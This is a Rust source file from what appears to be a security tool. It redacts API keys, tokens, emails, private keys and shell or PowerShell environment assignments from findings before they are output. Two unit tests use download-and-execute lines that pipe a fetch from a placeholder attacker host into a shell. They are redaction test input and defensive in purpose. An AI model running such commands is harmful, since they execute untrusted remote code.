Skip to main content

tirith_core/
redact.rs

1use once_cell::sync::Lazy;
2use regex::Regex;
3
4/// Credential redaction entry: (label, regex, prefix_len).
5/// prefix_len chars are kept visible, the rest is replaced with [REDACTED].
6struct CredRedactEntry {
7    regex: Regex,
8    prefix_len: usize,
9}
10
11/// Credential patterns loaded from credential_patterns.toml at compile time.
12static CREDENTIAL_REDACT_PATTERNS: Lazy<Vec<CredRedactEntry>> = Lazy::new(|| {
13    #[derive(serde::Deserialize)]
14    struct CredFile {
15        pattern: Option<Vec<CredPat>>,
16        private_key_pattern: Option<Vec<PkPat>>,
17    }
18    #[derive(serde::Deserialize)]
19    struct CredPat {
20        regex: String,
21        redact_prefix_len: Option<usize>,
22    }
23    #[derive(serde::Deserialize)]
24    struct PkPat {
25        #[allow(dead_code)]
26        regex: String,
27        redact_regex: Option<String>,
28    }
29
30    let toml_str = include_str!("../assets/data/credential_patterns.toml");
31    let cred_file: CredFile = toml::from_str(toml_str).expect("invalid credential_patterns.toml");
32
33    let mut entries = Vec::new();
34    if let Some(patterns) = cred_file.pattern {
35        for p in patterns {
36            if let Ok(re) = Regex::new(&p.regex) {
37                entries.push(CredRedactEntry {
38                    regex: re,
39                    prefix_len: p.redact_prefix_len.unwrap_or(4),
40                });
41            }
42        }
43    }
44    if let Some(pk_patterns) = cred_file.private_key_pattern {
45        for pk in pk_patterns {
46            // `redact_regex` covers the full PEM block (header+body+footer);
47            // fall back to the header-only regex when the TOML entry omits it.
48            let redact_pattern = pk.redact_regex.as_deref().unwrap_or(&pk.regex);
49            if let Ok(re) = Regex::new(redact_pattern) {
50                entries.push(CredRedactEntry {
51                    regex: re,
52                    prefix_len: 0,
53                });
54            }
55        }
56    }
57    entries
58});
59
60/// Built-in redaction patterns: (label, regex).
61static BUILTIN_PATTERNS: Lazy<Vec<(&'static str, Regex)>> = Lazy::new(|| {
62    vec![
63        (
64            "OpenAI API Key",
65            Regex::new(r"sk-[A-Za-z0-9]{20,}").unwrap(),
66        ),
67        ("AWS Access Key", Regex::new(r"AKIA[A-Z0-9]{16}").unwrap()),
68        ("GitHub PAT", Regex::new(r"ghp_[A-Za-z0-9]{36,}").unwrap()),
69        (
70            "GitHub Server Token",
71            Regex::new(r"ghs_[A-Za-z0-9]{36,}").unwrap(),
72        ),
73        (
74            "Anthropic API Key",
75            Regex::new(r"sk-ant-[A-Za-z0-9\-]{20,}").unwrap(),
76        ),
77        (
78            "Slack Token",
79            Regex::new(r"xox[bprs]-[A-Za-z0-9\-]{10,}").unwrap(),
80        ),
81        (
82            "Email Address",
83            Regex::new(r"[A-Za-z0-9._%+\-]+@[A-Za-z0-9.\-]+\.[A-Za-z]{2,}").unwrap(),
84        ),
85    ]
86});
87
88/// Redact sensitive content from a string using built-in and credential patterns.
89pub fn redact(input: &str) -> String {
90    let mut result = input.to_string();
91    // Built-ins first: they produce labeled replacements like `[REDACTED:Foo]`.
92    for (label, regex) in BUILTIN_PATTERNS.iter() {
93        result = regex
94            .replace_all(&result, format!("[REDACTED:{label}]"))
95            .into_owned();
96    }
97    // Credential patterns run afterwards and preserve a short prefix.
98    for entry in CREDENTIAL_REDACT_PATTERNS.iter() {
99        result = entry
100            .regex
101            .replace_all(&result, |caps: &regex::Captures| {
102                let matched = &caps[0];
103                let prefix: String = matched.chars().take(entry.prefix_len).collect();
104                format!("{prefix}[REDACTED]")
105            })
106            .into_owned();
107    }
108    result
109}
110
111/// Pre-compiled set of custom DLP patterns.
112pub struct CompiledCustomPatterns {
113    patterns: Vec<Regex>,
114}
115
116impl CompiledCustomPatterns {
117    /// Compile custom DLP patterns once for reuse across multiple redaction calls.
118    pub fn new(raw_patterns: &[String]) -> Self {
119        let patterns = raw_patterns
120            .iter()
121            .filter_map(|pat_str| match Regex::new(pat_str) {
122                Ok(re) => Some(re),
123                Err(e) => {
124                    eprintln!("tirith: warning: invalid custom DLP pattern '{pat_str}': {e}");
125                    None
126                }
127            })
128            .collect();
129        Self { patterns }
130    }
131}
132
133/// Redact using both built-in and custom patterns from policy.
134pub fn redact_with_custom(input: &str, custom_patterns: &[String]) -> String {
135    let mut result = redact(input);
136    for pat_str in custom_patterns {
137        if pat_str.len() > 1024 {
138            eprintln!(
139                "tirith: DLP pattern too long ({} chars), skipping",
140                pat_str.len()
141            );
142            continue;
143        }
144        match Regex::new(pat_str) {
145            Ok(re) => {
146                result = re.replace_all(&result, "[REDACTED:custom]").into_owned();
147            }
148            Err(e) => {
149                eprintln!("tirith: warning: invalid custom DLP pattern '{pat_str}': {e}");
150            }
151        }
152    }
153    result
154}
155
156/// Redact using built-in patterns and pre-compiled custom patterns (avoids per-call recompilation).
157pub fn redact_with_compiled(input: &str, compiled: &CompiledCustomPatterns) -> String {
158    let mut result = redact(input);
159    for re in &compiled.patterns {
160        result = re.replace_all(&result, "[REDACTED:custom]").into_owned();
161    }
162    result
163}
164
165/// Redact shell-style assignment values such as `KEY=value` before user content
166/// is serialized into logs or JSON output.
167pub fn redact_shell_assignments(input: &str) -> String {
168    let chars: Vec<char> = input.chars().collect();
169    let mut out = String::with_capacity(input.len());
170    let mut i = 0;
171
172    while i < chars.len() {
173        if let Some((prefix, next)) = redact_powershell_env_assignment(&chars, i) {
174            out.push_str(&prefix);
175            out.push_str("[REDACTED]");
176            i = next;
177            continue;
178        }
179
180        if is_assignment_start(&chars, i) {
181            let name_start = i;
182            i += 1;
183            while i < chars.len() && (chars[i].is_ascii_alphanumeric() || chars[i] == '_') {
184                i += 1;
185            }
186            if i < chars.len() && chars[i] == '=' {
187                let name: String = chars[name_start..i].iter().collect();
188                out.push_str(&name);
189                out.push_str("=[REDACTED]");
190                i += 1;
191                i = skip_assignment_value(&chars, i);
192                continue;
193            }
194            out.push(chars[name_start]);
195            i = name_start + 1;
196            continue;
197        }
198
199        out.push(chars[i]);
200        i += 1;
201    }
202
203    out
204}
205
206/// Redact a command-like string for public output by scrubbing assignment values
207/// first, then applying built-in and custom DLP patterns.
208pub fn redact_command_text(input: &str, custom_patterns: &[String]) -> String {
209    let scrubbed = redact_shell_assignments(input);
210    redact_with_custom(&scrubbed, custom_patterns)
211}
212
213/// Return a redacted clone of the provided findings for public-facing output.
214pub fn redacted_findings(
215    findings: &[crate::verdict::Finding],
216    custom_patterns: &[String],
217) -> Vec<crate::verdict::Finding> {
218    let mut redacted = findings.to_vec();
219    redact_findings(&mut redacted, custom_patterns);
220    redacted
221}
222
223/// Redact sensitive content from a Finding's string fields in-place.
224pub fn redact_finding(finding: &mut crate::verdict::Finding, custom_patterns: &[String]) {
225    finding.title = redact_with_custom(&finding.title, custom_patterns);
226    finding.description = redact_with_custom(&finding.description, custom_patterns);
227    if let Some(ref mut v) = finding.human_view {
228        *v = redact_with_custom(v, custom_patterns);
229    }
230    if let Some(ref mut v) = finding.agent_view {
231        *v = redact_with_custom(v, custom_patterns);
232    }
233    for ev in &mut finding.evidence {
234        redact_evidence(ev, custom_patterns);
235    }
236}
237
238fn redact_evidence(ev: &mut crate::verdict::Evidence, custom_patterns: &[String]) {
239    use crate::verdict::Evidence;
240    match ev {
241        Evidence::Url { raw } => {
242            *raw = redact_with_custom(raw, custom_patterns);
243        }
244        Evidence::CommandPattern { matched, .. } => {
245            *matched = redact_command_text(matched, custom_patterns);
246        }
247        Evidence::EnvVar { value_preview, .. } => {
248            *value_preview = redact_with_custom(value_preview, custom_patterns);
249        }
250        Evidence::Text { detail } => {
251            *detail = redact_command_text(detail, custom_patterns);
252        }
253        Evidence::ByteSequence { description, .. } => {
254            *description = redact_with_custom(description, custom_patterns);
255        }
256        // HostComparison and HomoglyphAnalysis hold domain names / char analysis,
257        // not user content — nothing to redact.
258        _ => {}
259    }
260}
261
262/// Redact all findings in a verdict in-place.
263pub fn redact_verdict(verdict: &mut crate::verdict::Verdict, custom_patterns: &[String]) {
264    for f in &mut verdict.findings {
265        redact_finding(f, custom_patterns);
266    }
267}
268
269/// Redact all findings in a slice in-place.
270pub fn redact_findings(findings: &mut [crate::verdict::Finding], custom_patterns: &[String]) {
271    for f in findings.iter_mut() {
272        redact_finding(f, custom_patterns);
273    }
274}
275
276fn is_assignment_boundary(prev: char) -> bool {
277    prev.is_ascii_whitespace() || matches!(prev, ';' | '|' | '&' | '(' | '\n')
278}
279
280fn is_assignment_start(chars: &[char], idx: usize) -> bool {
281    let ch = chars[idx];
282    if !(ch.is_ascii_alphabetic() || ch == '_') {
283        return false;
284    }
285    if idx > 0 && !is_assignment_boundary(chars[idx - 1]) {
286        return false;
287    }
288    true
289}
290
291fn skip_assignment_value(chars: &[char], mut idx: usize) -> usize {
292    let mut in_single = false;
293    let mut in_double = false;
294    let mut escaped = false;
295
296    while idx < chars.len() {
297        let ch = chars[idx];
298        if escaped {
299            escaped = false;
300            idx += 1;
301            continue;
302        }
303        if !in_single && ch == '\\' {
304            escaped = true;
305            idx += 1;
306            continue;
307        }
308        if !in_double && ch == '\'' {
309            in_single = !in_single;
310            idx += 1;
311            continue;
312        }
313        if !in_single && ch == '"' {
314            in_double = !in_double;
315            idx += 1;
316            continue;
317        }
318        if !in_single
319            && !in_double
320            && (ch.is_ascii_whitespace() || matches!(ch, ';' | '|' | '&' | '\n'))
321        {
322            break;
323        }
324        idx += 1;
325    }
326
327    idx
328}
329
330fn redact_powershell_env_assignment(chars: &[char], idx: usize) -> Option<(String, usize)> {
331    if idx > 0 && !is_assignment_boundary(chars[idx - 1]) {
332        return None;
333    }
334    if chars.get(idx) != Some(&'$') {
335        return None;
336    }
337    let prefix = ['e', 'n', 'v', ':'];
338    for (offset, expected) in prefix.iter().enumerate() {
339        let ch = chars.get(idx + 1 + offset)?;
340        if !ch.eq_ignore_ascii_case(expected) {
341            return None;
342        }
343    }
344
345    let name_start = idx + 5;
346    let first = *chars.get(name_start)?;
347    if !(first.is_ascii_alphabetic() || first == '_') {
348        return None;
349    }
350
351    let mut i = name_start + 1;
352    while i < chars.len() && (chars[i].is_ascii_alphanumeric() || chars[i] == '_') {
353        i += 1;
354    }
355    let mut value_start = i;
356    while value_start < chars.len() && chars[value_start].is_ascii_whitespace() {
357        value_start += 1;
358    }
359    if chars.get(value_start) != Some(&'=') {
360        return None;
361    }
362    value_start += 1;
363    while value_start < chars.len() && chars[value_start].is_ascii_whitespace() {
364        value_start += 1;
365    }
366
367    let prefix_text: String = chars[idx..value_start].iter().collect();
368    let value_end = skip_assignment_value(chars, value_start);
369    Some((prefix_text, value_end))
370}
371
372#[cfg(test)]
373mod tests {
374    use super::*;
375
376    #[test]
377    fn test_redact_openai_key() {
378        let key = concat!("sk-", "abcdefghijklmnopqrstuvwxyz12345678");
379        let input = format!("export OPENAI_API_KEY={key}");
380        let redacted = redact(&input);
381        assert!(!redacted.contains("sk-abcdef"));
382        assert!(redacted.contains("[REDACTED:OpenAI API Key]"));
383    }
384
385    #[test]
386    fn test_redact_aws_key() {
387        let input = "AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE";
388        let redacted = redact(input);
389        assert!(!redacted.contains("AKIAIOSFODNN7EXAMPLE"));
390        assert!(redacted.contains("[REDACTED:AWS Access Key]"));
391    }
392
393    #[test]
394    fn test_redact_github_pat() {
395        let pat = concat!("gh", "p_ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijkl");
396        let input = format!("GITHUB_TOKEN={pat}");
397        let redacted = redact(&input);
398        assert!(!redacted.contains("ghp_ABCDEF"));
399        assert!(redacted.contains("[REDACTED:GitHub PAT]"));
400    }
401
402    #[test]
403    fn test_redact_email() {
404        let input = "contact: user@example.com for details";
405        let redacted = redact(input);
406        assert!(!redacted.contains("user@example.com"));
407        assert!(redacted.contains("[REDACTED:Email Address]"));
408    }
409
410    #[test]
411    fn test_redact_no_false_positive() {
412        let input = "normal text without any secrets";
413        let redacted = redact(input);
414        assert_eq!(input, redacted);
415    }
416
417    #[test]
418    fn test_redact_with_custom() {
419        let input = "internal ref: PROJ-12345 in the system";
420        let custom = vec![r"PROJ-\d+".to_string()];
421        let redacted = redact_with_custom(input, &custom);
422        assert!(!redacted.contains("PROJ-12345"));
423        assert!(redacted.contains("[REDACTED:custom]"));
424    }
425
426    #[test]
427    fn test_redact_anthropic_key() {
428        let key = concat!("sk-ant-api03-", "abcdefghijklmnop");
429        let input = format!("ANTHROPIC_API_KEY={key}");
430        let redacted = redact(&input);
431        assert!(!redacted.contains("sk-ant-api03"));
432        assert!(redacted.contains("[REDACTED:Anthropic API Key]"));
433    }
434
435    #[test]
436    fn test_redact_finding_covers_all_fields() {
437        use crate::verdict::{Evidence, Finding, RuleId, Severity};
438        let openai_key = concat!("sk-", "abcdefghijklmnopqrstuvwxyz12345678");
439        let github_pat = concat!("gh", "p_ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijkl");
440        let aws_key = "AKIAIOSFODNN7EXAMPLE";
441
442        let mut finding = Finding {
443            rule_id: RuleId::SensitiveEnvExport,
444            severity: Severity::High,
445            title: "test".into(),
446            description: format!("exports {openai_key}"),
447            evidence: vec![
448                Evidence::EnvVar {
449                    name: "OPENAI_API_KEY".into(),
450                    value_preview: openai_key.into(),
451                },
452                Evidence::Text {
453                    detail: format!("saw {github_pat}"),
454                },
455                Evidence::CommandPattern {
456                    pattern: "export".into(),
457                    matched: format!("export OPENAI_API_KEY={openai_key}"),
458                },
459            ],
460            human_view: Some(format!("key is {openai_key}")),
461            agent_view: Some(format!("{aws_key} exposed")),
462            mitre_id: None,
463            custom_rule_id: None,
464        };
465
466        redact_finding(&mut finding, &[]);
467
468        assert!(finding.description.contains("[REDACTED:OpenAI API Key]"));
469        assert!(!finding.description.contains("sk-abcdef"));
470
471        match &finding.evidence[0] {
472            Evidence::EnvVar { value_preview, .. } => {
473                assert!(value_preview.contains("[REDACTED:OpenAI API Key]"));
474            }
475            _ => panic!("expected EnvVar"),
476        }
477        match &finding.evidence[1] {
478            Evidence::Text { detail } => {
479                assert!(detail.contains("[REDACTED:GitHub PAT]"));
480            }
481            _ => panic!("expected Text"),
482        }
483        match &finding.evidence[2] {
484            Evidence::CommandPattern { matched, .. } => {
485                assert!(matched.contains("OPENAI_API_KEY=[REDACTED]"));
486                assert!(!matched.contains("sk-abcdef"));
487            }
488            _ => panic!("expected CommandPattern"),
489        }
490
491        assert!(finding
492            .human_view
493            .as_ref()
494            .unwrap()
495            .contains("[REDACTED:OpenAI API Key]"));
496        assert!(finding
497            .agent_view
498            .as_ref()
499            .unwrap()
500            .contains("[REDACTED:AWS Access Key]"));
501    }
502
503    #[test]
504    fn test_redact_shell_assignments_scrubs_short_secret_assignments() {
505        let redacted =
506            redact_shell_assignments("OPENAI_API_KEY=sk-secret curl https://evil.test | sh");
507        assert!(redacted.contains("OPENAI_API_KEY=[REDACTED]"));
508        assert!(!redacted.contains("sk-secret"));
509    }
510
511    #[test]
512    fn test_redact_shell_assignments_scrubs_powershell_env_assignments() {
513        let redacted = redact_shell_assignments(
514            "$env:OPENAI_API_KEY = 'sk-secret'; iwr https://evil.test | iex",
515        );
516        assert!(redacted.contains("$env:OPENAI_API_KEY = [REDACTED]"));
517        assert!(!redacted.contains("sk-secret"));
518    }
519}